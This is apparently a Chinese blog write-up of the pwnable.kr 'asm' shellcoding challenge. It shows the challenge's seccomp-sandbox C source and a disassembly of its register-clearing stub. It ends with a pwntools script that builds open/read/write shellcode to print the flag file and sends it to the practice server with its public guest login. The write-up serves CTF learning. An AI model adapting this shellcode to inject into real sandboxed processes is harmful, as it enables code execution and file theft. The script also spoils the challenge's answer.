pwnable之asm
来源:互联网 发布:淘宝分流比例设置 编辑:程序博客网 时间:2024/06/02 04:28
问题描述
Welcome to shellcoding practice challenge.In this challenge, you can run your x64 shellcode under SECCOMP sandbox.Try to make shellcode that spits flag using open()/read()/write() systemcalls only.If this does not challenge you. you should play 'asg' challenge
asm.c
#include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h> #include <seccomp.h> #include <sys/prctl.h> #include <fcntl.h> #include <unistd.h> #define LENGTH 128 void sandbox(){ scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); if (ctx == NULL) { printf("seccomp error\n"); exit(0); } seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0); seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); if (seccomp_load(ctx) < 0){ seccomp_release(ctx); printf("seccomp error\n"); exit(0); } seccomp_release(ctx); } char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff"; unsigned char filter[256]; int main(int argc, char* argv[]){ setvbuf(stdout, 0, _IONBF, 0); setvbuf(stdin, 0, _IOLBF, 0); printf("Welcome to shellcoding practice challenge.\n"); printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n"); printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n"); printf("If this does not challenge you. you should play 'asg' challenge :)\n"); char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0); memset(sh, 0x90, 0x1000); memcpy(sh, stub, strlen(stub)); int offset = sizeof(stub); printf("give me your x64 shellcode: "); read(0, sh+offset, 1000); alarm(10); chroot("/home/asm_pwn"); // you are in chroot jail. so you can't use symlink in /tmp sandbox(); ((void (*)(void))sh)(); return 0; }
分析
sh可以写入shellcode,sub是对寄存器清零操作。
(ipython)In [4]: print disasm('\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff') 0: 48 31 c0 xor rax,rax 3: 48 31 db xor rbx,rbx 6: 48 31 c9 xor rcx,rcx 9: 48 31 d2 xor rdx,rdx c: 48 31 f6 xor rsi,rsi f: 48 31 ff xor rdi,rdi 12: 48 31 ed xor rbp,rbp 15: 4d 31 c0 xor r8,r8 18: 4d 31 c9 xor r9,r9 1b: 4d 31 d2 xor r10,r10 1e: 4d 31 db xor r11,r11 21: 4d 31 e4 xor r12,r12 24: 4d 31 ed xor r13,r13 27: 4d 31 f6 xor r14,r14 2a: 4d 31 ff xor r15,r15
在sandbox里只能调用open,read,write。
from pwn import *con = ssh(host='pwnable.kr',user='asm',password='guest',port=2222)p = con.connect_remote('0',9026)context.arch='amd64'shellcode = ''shellcode += shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')shellcode += shellcraft.open('rsp',0,0)shellcode += shellcraft.read('rax','rsp',0x80)shellcode += shellcraft.write(1,'rsp',0x80)p.sendline(asm(shellcode))print p.recvall()
阅读全文
0 0
- pwnable.kr 之asm
- pwnable之asm
- pwnable之coin1
- pwnable之blackjack
- pwnable.kr 之fd
- pwnable.kr之bof
- pwnable.kr之flag
- pwnable.kr之passcode
- pwnable.kr之random
- pwnable.kr之shellshock
- pwnable.kr之mistake
- pwnable.kr之input
- pwnable.kr之lotto
- pwnable.kr之cmd1
- pwnable.kr之blackjack
- pwnable.kr之uaf
- pwnable之input
- pwnable.kr之cmd2
- Pascal's Triangle
- 研发人员的考核
- jenkins疑难解答
- 第一篇:基本框架(基类,网络框架,主页面)
- C++11新特性总结
- pwnable之asm
- Codeforces859C
- 240. Search a 2D Matrix II
- Javaclient端怎么判断server端socket是否已经断开
- 交换机vlan配置
- JDBC
- 表单传值的方式
- redis 订阅(subscribe/psubscribe)和发布 (publish)
- Maven配置